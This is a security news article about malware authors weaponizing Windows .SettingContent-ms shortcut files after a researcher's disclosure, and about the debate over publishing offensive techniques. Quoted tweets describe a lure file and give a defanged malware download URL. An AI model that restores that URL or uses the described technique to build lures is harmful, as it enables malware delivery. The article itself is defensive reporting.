Malware authors are frantically trying to weaponize a new infection vector that was revealed at the start of June.
The trick relies on using Windows Settings (.SettingContent-ms) shortcut files in order to achieve code execution on Windows 10 PCs.
Ever since SpecterOps security researcher Matt Nelson published his research on the matter three weeks ago, malware authors have been playing around with proof-of-concept code in attempts of crafting an exploit that can deploy weaponized malware on a victim's system.
With each passing day, more and more exploits are being uploaded on VirusTotal. FireEye security researcher Nick Carr has been avidly tracking these uploads for the past two weeks and has been documenting new findings in Twitter threads like this, this, this, this, or this.
yawn.SettingContent-ms— Nick Carr (@ItsReallyNick) July 3, 2018
Exploring POCs and attacker usage of a particular method like @enigma0x3's responsibly-disclosed #DeepLink technique is mostly uneventful. We'll try to keep sharing some interesting public samples as the technique trickles downstream. pic.twitter.com/zeKQdtTUpQ
But while previous uploads have been mostly inept tests [1, 2], in recent days, crooks have also put together the first exploit chain that uses a SettingsContent-ms file to actually download and install an actual malware sample.
"Quotation_Request_Sheet.SettingContent-ms"#DeepLink @enigma0x3 method— Nick Carr (@ItsReallyNick) July 2, 2018
0 static AV detections in VT
Uses PowerShell to download & launch hxxps://lanitida[.]net/LAW231.exe
Uploaded just now (2 min ago): https://t.co/2OC6vzrXyw pic.twitter.com/84oTsnE7dm
While you could attribute some of these VirusTotal uploads to security researchers playing around with Nelson's PoC, the discovery of a weaponized exploit suggests some malware distributors are serious about their tests and telling about their intentions.
Jérôme Segura, a Malwarebytes security researcher who also penned a blog post about the weaponized SettingContent-ms exploit that Carr discovered told Bleeping Computer he also expects this to be integrated into live distribution campaigns.
"Its name 'quotation' is very much like a lure we see in malspam," Segura said referring to the VT upload's name of "Quotation_Request_Sheet.SettingContent-ms."
But the rise in weaponized SettingContent-ms exploits uploaded on VirusTotal has also sparked discussions in the infosec community about the practice of blogging about offensive hacking tricks, like the Nelson article about the SettingContent-ms technique.
You can follow the discussion via this Twitter thread, and see opinions that support keeping such techniques secret, while others argue that "security through obscurity" only helps attackers.
One of the most interesting replies in this conversation came from Justin Warner, technical director at cyber-security firm ICEBRG.
"A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release," Warner said. "[A public offensive hacking technique] lures threats to predictable detection points."
A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release. Lures threats to predictable detection points. I know there is risk and other nuance, but somewhat helpful— Justin Warner (@sixdub) July 3, 2018
Image credits: Nick Carr